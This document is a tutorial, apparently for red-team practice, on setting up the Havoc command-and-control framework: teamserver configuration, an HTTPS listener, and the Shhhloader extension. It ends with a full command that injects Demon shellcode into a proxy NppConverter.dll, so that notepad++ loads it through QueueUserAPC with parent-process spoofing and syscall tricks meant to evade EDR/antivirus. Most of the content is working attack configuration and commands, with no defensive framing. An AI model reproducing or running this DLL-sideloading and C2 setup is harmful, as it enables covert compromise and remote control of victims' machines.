Practical with Havoc Framework

Teamserver Configuration

Teamserver needs a configuration profile (usually yml) to define parameters like IP, port, user and password.

Create configuration profile.

In the folder teamserver/data and fix and create file config.yml. Add script below.

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "at19n" {
        Password = "P@ssw0rd"
    }
}

# this is optional. if you dont use it you can remove it.
Service {
    Endpoint = "service-endpoint"
    Password = "service-password"
}

Demon {
    Sleep = 2
    Jitter = 15

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Start Teamserver

Run teamserver with configuration profile

./havoc server --profile profiles/havoc.yaotl -v

Start Client

Client is graphical interface to interact with teamserver

From folder client/build, run client:

Setup Listener

Listener is the point of receiving connections from agents (Demons) on the victim machine.

In the interface client, navigate Listeners -> Create Listeners.

A configuration listener (example: HTTPS)

Name: at19n-test
Type: HTTPS
Host: IP Address teamserver or redirector
Port: 443
Callback Interval: Time between callbacks (example: 5s)

Save and start listener. If success, listener display status "Active"

Hands on

Install Extensions

Extensions list

After clicking install, Havoc client automatically clones the Shhhloader source from github.

Description: Shhhahoc is the name of the Shhhloader integration module into Havoc, which allows the use of advanced shellcode injection techniques to evade EDR/AV.

Fearture:

Use SysWhispers (SysWhispers2, SysWhispers3, GetSyscallStub) to execute syscall indirect
Supports injection methods like PoolParty, ThreadlessInject, ModuleStomping, QueueUserAPC, ProcessHollow.
Encode options shellcode and sign digital certificates to avoid detection.

Hands on

Create shellcode

Create and deployment Payload with Shhhloader

Use Shhhloader to inject demon.x64.bin shellcode into legitimate NppConverter.dll

Purpose:

Create a malicious DLL (NppConverter.dll) containing shellcode that creates a connect to Havoc C2
This DLL will be loaded by notepad++.exe on startup, execute shellcode via QueueUserAPC.
On the Windows machine, we will change NppConverter.dll legitimate equal a malicious DLL to activate the payload.

/usr/bin/python3 /root/Havoc/data/extensions/Shhhloader/Shhhloader.py /root/share/demon.x64.bin -sc GetSyscallStub -m QueueUserAPC -o /root/share/NppConverter.dll -dp NppConverter.dll -pp explorer.exe -p notepad++.exe

/root/share/demon.x64.bin: Path to Demon shellcode
-sc GetSyscallStub: Use GetSyscallStub syscall method to avoid EDR hook
-m QueueUserAPC: Shellcode injection method using QueueUserAPC
-o /root/share/NppConverter.dll: The output file is NppConverter.dll (a malicious DLL)
-dp NppConverter.dll: Create a proxy DLL based on the legitimate NppConverter.dll
-pp explorer.exe: The parent process is explorer.exe
-p notepad++.exe: The target process for shellcode injection is notepad++.exe